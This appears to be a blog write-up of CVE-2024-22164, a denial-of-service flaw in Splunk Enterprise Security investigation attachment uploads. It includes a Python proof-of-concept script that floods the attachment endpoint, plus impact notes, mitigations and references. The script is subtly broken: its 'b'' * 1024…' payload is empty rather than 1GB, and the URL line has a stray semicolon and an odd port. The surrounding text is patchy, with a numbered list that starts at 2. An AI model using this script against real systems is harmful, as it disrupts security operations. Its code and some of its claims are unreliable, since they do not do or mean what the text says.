Splunk is a household name for organizations needing powerful log management and security operations. Their Splunk Enterprise Security (ES) app is often at the heart of Security Operations Centers, providing investigation tracking, correlation searches, and powerful dashboards.

Recently, a security issue tracked as CVE-2024-22164 was discovered affecting Splunk Enterprise Security versions prior to 7.1.2. The flaw is simple in concept—a missing control on attachment uploads can lead to a denial of service (DoS) for security investigations.

The Vulnerability: What Happened?

In Splunk ES, security analysts often use the *Investigation* feature to document and organize evidence when responding to incidents. They can upload attachments, such as screenshots or exported logs, to these investigations.

The problem?
The server endpoint responsible for handling these file uploads (the “attachments” endpoint) does not limit the size of incoming files. That means an attacker—even one with only analyst access—could upload a huge file.

If abused:
A malicious upload will cause the investigation process to choke. Large files can consume all available disk and memory allocated for the investigation. Eventually, this causes the investigation to crash, hang, or become otherwise inaccessible to legitimate users.

Proof of Concept (PoC): How Could It Be Exploited?

Below is a simple proof-of-concept using Python’s requests library to simulate a huge file upload against a vulnerable Splunk Enterprise Security instance.

import requests

# Change these values
splunk_url = 'https://your-splunk-server:800';
username = 'your_username'
password = 'your_password'

# Authenticate
auth = (username, password)

# Prepare a large payload (e.g., 1GB of zeros)
payload = b'' * 1024 * 1024 * 1024  # 1GB

# File data to upload
files = {
    'attachment': ('bigfile.bin', payload, 'application/octet-stream')
}

# The endpoint for investigation attachments (you'll need a valid investigation ID)
investigation_id = "example_id"
endpoint = f"{splunk_url}/en-US/splunkd/__raw/servicesNS/nobody/SplunkEnterpriseSecuritySuite/ess_Investigation/attachment/{investigation_id}"

# Upload the huge file
response = requests.post(endpoint, auth=auth, files=files, verify=False)

print("Server response:", response.status_code, response.text)

Disclaimer:
Never use this code on production systems without explicit permission. It can disrupt security operations.

Inaccessible investigations: Teams can’t open investigation details until manual intervention.

- Resource drain: Excessive server RAM/CPU usage can impact Splunk dashboards, searches, and alerting.
- Potential for wider DoS: Aggressive exploitation can fill up disk quotas, affecting the entire Splunk deployment.

Mitigation

Splunk released a patch in Enterprise Security 7.1.2 see release notes which introduces proper size checks on attachments uploads.

Update ASAP: Upgrade Splunk ES to version 7.1.2 or newer.

2. Monitor: Watch storage utilization and investigation system logs for abnormal attachment upload activity.
3. Limit access: Restrict investigation editing/upload permissions where possible.
4. WAF and Reverse Proxy: If you can’t patch quickly, configure a proxy to block or limit large file uploads to Splunk’s investigation endpoints.

References

- Splunk CVE Advisory: https://advisory.splunk.com/advisories/SVD-2024-0212
- Splunk ES Release Notes v7.1.2: https://docs.splunk.com/Documentation/ES/7.1.2/RN/ESRN
- NIST NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-22164

Summary

CVE-2024-22164 is a critical “low hanging fruit” bug—no special hacking skills required! Anyone with permissions to attach files in Splunk ES investigations can effectively take down core investigation workflows by uploading gigantic files.

Patch promptly and remind your teams never to trust file content or size from users, even trusted insiders.

Timeline

Published on: 01/09/2024 17:15:12 UTC
Last modified on: 01/16/2024 17:40:17 UTC